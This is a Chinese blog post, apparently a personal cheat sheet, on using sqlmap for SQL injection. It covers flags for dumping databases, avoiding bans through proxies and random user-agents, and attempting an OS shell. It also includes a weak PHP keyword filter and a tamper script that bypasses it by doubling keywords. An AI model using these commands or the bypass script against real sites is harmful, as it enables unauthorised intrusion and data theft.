sqlmap

sqlmap的常见使用方式

需要python环境

sql注入

常见指令:

  • -u 指定url

  • --dbs 获得数据库

  • --tables 获得表

  • --columns 获得字段

  • --dump 枚举所有数据

  • -D 库名 -T 表名 - C 字段

  • --forms 让sqlmap自己寻找页面表单

    为了防止被ban,还需下面操作

  • --count 查询数据量

  • --random-agent 构造随机user-agent

  • --delay=2 延迟2秒

  • --level 1-5(默认为1,低等级,如果跑不出来可以加高等级)

  • --tamper xxxxx.py 调用tamper脚本

1
sqlmap -u "https:xxxx.com?id=1" --dbs --count
  • --is-dba 查看权限是否为root,如果显示DBA为TRUE 可以尝试直接webshell

  • --os-shell 尝试拿shell

  • --batch 不询问输入,全部默认确定

  • -v 显示详细的输出等级(-v 3 会显示Payload)

代理:

1
–proxy http://192.168.1.1:xxxx
1
2
3
–proxy-file:加载代理ip列表

–proxy-file=xxx.txt

--fresh-queries

​ 不会从缓存里面加载

1
python sqlmap.py -u "xxxxx" --proxy=http://127.0.0.1:10809 --is-dba --level 5

tamper

使用:--tamper=xxxx.py

环境:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
function sqlwaf( $str ) {

$str = str_ireplace( "and", "", $str );

$str = str_ireplace( "or", "", $str );

$str = str_ireplace( "union", "", $str );

$str = str_ireplace( "select", "", $str );

$str = str_ireplace( "sleep", "", $str );

$str = str_ireplace( "group", "", $str );

$str = str_ireplace( "extractvalue", "", $str );

$str = str_ireplace( "updatexml", "", $str );

$str = str_ireplace( "PROCEDURE", "", $str );

return $str;

}

tamper脚本编写:xxxx.py (关键词替换)

1
2
3
4
5
6
7
8
9
10
11
12

# sqlmap/tamper/escapequotes.py
from lib.core.enums import PRIORITY
__priority__ = PRIORITY.NORMAL #__priority__指定了tamper脚本的优先级

def dependencies():
pass

def tamper(payload, **kwargs):
if payload:
result = payload.replace("OR", "oorr").replace("AND", "aandnd").replace("UNION", "ununionion").replace("SELECT", "seleselectct").replace("PROCEDURE", "PROCEPROCEDUREURE").replace("SLEEP", "slesleepep").replace("GROUP", "grogroupup").replace("EXTRACTVALUE", "extractvextractvaluealue").replace("UPDATEXML", "updatupdatexmlexml")
return result

固定格式:

1
2
3
4
5
6
7
8
9
10
11
12
13
14

import xxx #根据需求

from lib.core.enums import PRIORITY
__priority__ = PRIORITY.NORMAL

def tamper(payload, **kwargs):
if payload:
xxxxx
xxxxx
xxxxx
result=xxxxx

return result
  • Copyrights © 2020-2023 Shmily-ing
  • Visitors: | Views:

请我喝杯咖啡吧~

支付宝
微信